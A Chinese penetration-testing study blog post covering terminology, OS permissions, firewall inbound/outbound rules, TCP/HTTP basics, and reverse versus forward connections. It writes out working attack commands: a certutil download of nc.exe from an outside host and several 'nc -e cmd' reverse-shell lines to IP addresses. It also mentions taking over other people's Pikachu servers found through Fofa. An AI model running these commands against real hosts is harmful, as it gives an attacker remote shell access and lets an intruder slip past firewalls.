渗透学习-1

在这里插入图片描述

名词解释

前后端, POC/EXP, Payload/Shellcode,后门/Webshell,木马/病毒,
反弹,回显,跳板,黑白盒测试,暴力破解,社会工程学,撞库, ATT&CK 等
渗透测试常用专业术语
https://forum.ywhack.com/bountytips.php?download
https://forum.ywhack.com/reverse-shell/
https://blog.csdn.net/weixin_43303273/article/details/83029138

演示案例:

 基础案例 1:操作系统-用途&命令&权限&用户&防火墙
 实用案例 1:文件上传下载-解决无图形化&解决数据传输
 实用案例 2:反弹 Shell 命令-解决数据回显&解决数据通讯
 结合案例 1:防火墙绕过-正向连接&反向连接&内网服务器
 结合案例 2:学会了有手就行-Fofa 拿下同行 Pikachu 服务器

基础案例 1:操作系统-用途&命令&权限&用户&防火墙

1、个人计算机&服务器用机

个人计算机-win7/win10
服务器用机- windows 2012/ windows 2019

2、 Windows&Linux 常见命令

windows - cmd/powershell
Linux -
Windows下常用的100个CMD指令以及常见的操作
渗透测试中常用的命令

3、 文件权限&服务权限&用户权限等

权限优先级:如果一个用户既是某个文件的特定用户的权限接收者,又是该文件的用户组的成员,那么该用户的有效权限是这两组权限的合集。但请注意,"拒绝"权限优先于"允许"权限。这意味着如果一个用户被明确地拒绝了某个权限,那么即使他所在的用户组被授权了那个权限,他仍然无法访问。

4、系统用户&用户组&服务用户等分类

Windows的权限(用户、组和访问控制)

5、 自带防火墙出站&入站规则策略协议

出站 - 我访问别人
入站 - 别人访问我
网站走http协议,是属于应用层面的(常见的http访问网站,SMTP 收发邮件等等), windows/linux自带的防火墙不拦截,但是web防火墙拦截,就是常见的安全狗D盾等WAF。waf针对http请求进行处理,比如过滤URL 是否带有恶意参数进行sql注入,XSS等等。但是访问系统/内网主机等直接在系统层面的传输,走tcp协议进行一些系统命令操作等等,则需要过系统自带防火墙, 如linux的iptables

TCP源端口和目的端口 Port

源端口号:16位的源端口中包含初始化通信的端口。源端口和源IP地址的作用是标识报文的返回地址。
目的端口号:16位的目的端口域定义传输的目的。这个端口指明报文接收计算机上的应用程序地址接口。计算机通过端口号识别访问哪个服务,比如http服务或ftp服务,发送方端口号是进行随机端口,目标端口号决定了接收方哪个程序来接收 分别占用16位,也就是端口号最大是2^16,所以端口号的范围是0~65536

通常,Http把客户端的访问请求(可以是访问一个文件,访问一张图片等等)经由服务器端收到后返回展示在客户端上。由HTTP客户端发起一个请求,创建一个到服务器指定端口(默认是80端口,r如果访问mysql则可以是 3306端口,总之TCP连接时必须有对应的目标服务器的端口,这个端口代表着某种服务)的TCP连接。HTTP服务器则在那个端口监听客户端的请求。一旦收到请求,服务器会向客户端返回一个状态,比如"HTTP/1.1 200 OK",以及返回的内容,如请求的文件、错误消息、或者其它信息。请求就需要用到请求报文,报文又包含一系列的东西。
看了这篇http协议,你还敢说之前会吗?
通俗理解TCP/IP协议
换个角度理解TCP/IP协议
防火墙的基本概念(1)TCP/IP协议
防火墙的基本概念(2)防火墙
通俗易懂—IP与Mac的联系与区别
图解ARP协议(一)
一文讲透Token与Cookie、Session的区别
会话技术Cookie详解(含案例)
Cookie 从入门到进阶:一文彻底弄懂其原理以及应用

实用案例 1:文件上传下载 - 为了解决无图形化&解决数据传输

很多时候没有图形化的界面给你操作,只能使用命令
Linux: wget curl python ruby perl java 等
Windows: PowerShell Certutil Bitsadmin msiexec mshta rundll32 等
自动生成下载命令

实用案例 2: 反弹 Shell 命令-为了 解决数据回显&解决数据通讯

很多时候执行了命令却看不到回显,不知道是否执行成功,又或者需要交互式执行,比如需要输入修改密码、添加用户登命令,纯粹的webshell无法执行这些动作,所以需要反弹个shell窗口回来
useradd 用户名 passwd 用户名
测试 Linux 系统添加用户或修改密码命令交互回显问题

结合案例 1:防火墙绕过-正向连接&反向连接&内网服务器

在这里插入图片描述

1、内网 - 同一个路由器出网,内网里面有多台设备
内网 -> xiaodi8
xiaodi8 !-> 内网
2、防火墙 - 防火墙出站宽松,入站拦截严重
比如反弹windows cmd窗口 到1.2.3.4上并以5567端口接受

nc -e cmd 1.2.3.4 5567

==正向连接 == - 假如把A的cmd窗口显示到设备B上,A去连接B, 以A的视角来说,则是正向连接,以B的视角,则是反向连接
一般常用的说法是,自己的工具主机是反向连接,目标主机正向连接,因为需要目标主机主动反弹窗口过来

xiaodi8 < - > aliyun
xiaodi8 + 防火墙 -> aliyun 对于小迪8来说就是出站 防火墙不拦截
aliyun !-> xiaodi8+防火墙 对于小迪8来说就是入站 防火墙拦截

Nginx教程 反向代理
正向代理 - 对于客户端来说,就相当于挂了vpn再去访问服务器,访问到的看到的是真正的服务器
反向代理 - 客户端访问到的看到的是中间服务器,真正的目标服务器把请求转发到中间服务器, 目标服务器隐藏在中间服务器后面

结合案例 2:学会了有手就行-Fofa 拿下同行 Pikachu 服务器

例子还是看下视频
文件下载&反弹 Shell:
certutil -urlcache -split -f http://www.xiaodi8.com/nc.exe nc.exe
nc -e cmd 47.75.212.155 5566

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值